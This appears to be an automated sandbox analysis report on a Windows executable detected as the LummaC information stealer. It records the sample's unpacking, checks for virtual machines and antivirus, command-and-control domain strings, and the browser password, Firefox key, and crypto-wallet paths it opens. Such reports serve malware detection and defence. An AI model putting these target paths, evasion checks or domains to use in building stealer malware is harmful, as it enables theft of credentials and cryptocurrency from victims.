            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: 20qMFnd9tO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1814752389.00000000007DF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@1/1
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_007E04C6 CreateToolhelp32Snapshot,Module32First,0_2_007E04C6
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_00427EC8 CoCreateInstance,0_2_00427EC8
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7556
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\0c3fa637-8c1d-4730-a530-86649b579ebdJump to behavior
            Source: 20qMFnd9tO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 20qMFnd9tO.exe, 00000000.00000003.1632039093.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1632383321.0000000002D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 20qMFnd9tO.exeReversingLabs: Detection: 38%
            Source: 20qMFnd9tO.exeVirustotal: Detection: 38%
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile read: C:\Users\user\Desktop\20qMFnd9tO.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\20qMFnd9tO.exe "C:\Users\user\Desktop\20qMFnd9tO.exe"
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 1556
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeUnpacked PE file: 0.2.20qMFnd9tO.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeUnpacked PE file: 0.2.20qMFnd9tO.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_3_008A59B9 pushfd ; retf 0_3_008A598D
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_3_008A59B9 pushfd ; retf 0_3_008A598D
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_3_008A5342 pushfd ; retf 0_3_008A53A5
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_3_008A5342 pushfd ; retf 0_3_008A53A5
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_3_008A5978 pushfd ; retf 0_3_008A598D
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_3_008A5978 pushfd ; retf 0_3_008A598D
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_3_008A59B9 pushfd ; retf 0_3_008A598D
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_3_008A59B9 pushfd ; retf 0_3_008A598D
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_3_008A5342 pushfd ; retf 0_3_008A53A5
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_3_008A5342 pushfd ; retf 0_3_008A53A5
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_3_008A5978 pushfd ; retf 0_3_008A598D
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_3_008A5978 pushfd ; retf 0_3_008A598D
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_0043E05C push ss; retf 0_2_0043E099
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_0043CE48 push es; retn 0043h0_2_0043CE49
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_007DF004 pushad ; retf 007Dh0_2_007DF035
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_007E1590 push ebp; ret 0_2_007E1592
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe TID: 7576Thread sleep time: -150000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exe TID: 7576Thread sleep time: -30000s >= -30000sJump to behavior
            Source: Amcache.hve.3.drBinary or memory string: VMware
            Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: 20qMFnd9tO.exe, 00000000.00000003.1631574292.0000000000858000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1704319206.0000000000858000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.3.drBinary or memory string: vmci.sys
            Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: 20qMFnd9tO.exe, 00000000.00000003.1631574292.0000000000858000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1704319206.0000000000858000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWR
            Source: Amcache.hve.3.drBinary or memory string: VMware20,1
            Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: 20qMFnd9tO.exe, 00000000.00000002.1814774211.000000000080A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
            Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006E092B mov eax, dword ptr fs:[00000030h]0_2_006E092B
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_006E0D90 mov eax, dword ptr fs:[00000030h]0_2_006E0D90
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeCode function: 0_2_007DFDA3 push dword ptr fs:[00000030h]0_2_007DFDA3

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: 20qMFnd9tO.exeString found in binary or memory: enthusiasimtitleow.shop
            Source: 20qMFnd9tO.exeString found in binary or memory: worryfillvolcawoi.shop
            Source: 20qMFnd9tO.exeString found in binary or memory: cleartotalfisherwo.shop
            Source: 20qMFnd9tO.exeString found in binary or memory: wagonglidemonkywo.shop
            Source: 20qMFnd9tO.exeString found in binary or memory: pillowbrocccolipe.shop
            Source: 20qMFnd9tO.exeString found in binary or memory: communicationgenerwo.shop
            Source: 20qMFnd9tO.exeString found in binary or memory: diskretainvigorousiw.shop
            Source: 20qMFnd9tO.exeString found in binary or memory: affordcharmcropwo.shop
            Source: 20qMFnd9tO.exeString found in binary or memory: dismissalcylinderhostw.shop
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: 20qMFnd9tO.exe, 00000000.00000002.1814961062.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1683082452.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1704319206.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1704561901.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1704184420.00000000008B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 20qMFnd9tO.exe PID: 7556, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: 20qMFnd9tO.exe, 00000000.00000003.1631783820.00000000008A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Electrum\\wallets",
            Source: 20qMFnd9tO.exe, 00000000.00000003.1640623370.0000000002D7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Edge/Default/Extensions/Jaxx LibertyB
            Source: 20qMFnd9tO.exe, 00000000.00000003.1631783820.00000000008A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "m": ["app-store.json", ".finger-print.fp", "simple-storage.json", "window-state.json"],
            Source: 20qMFnd9tO.exe, 00000000.00000003.1631783820.00000000008A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Exodus\\exodus.wallet",
            Source: 20qMFnd9tO.exeString found in binary or memory: Edge/Default/Extensions/ExodusWeb3
            Source: 20qMFnd9tO.exe, 00000000.00000002.1814381070.0000000000197000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: 5Aapp-store.jsonAWallets/BinanceC:\Users\user\AppData\Roaming\BinanceA%appdata%\Binance f
            Source: 20qMFnd9tO.exe, 00000000.00000003.1631783820.00000000008A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Ethereum",
            Source: 20qMFnd9tO.exe, 00000000.00000003.1704561901.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: 20qMFnd9tO.exe, 00000000.00000003.1704561901.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: 20qMFnd9tO.exe, 00000000.00000002.1814381070.0000000000197000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: 5AWallets/Ledger Live{4AC:\Users\user\AppData\Roaming\Ledger Live+Y)A%appdata%\Ledger Live
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\Application Data\Mozilla\FirefoxJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
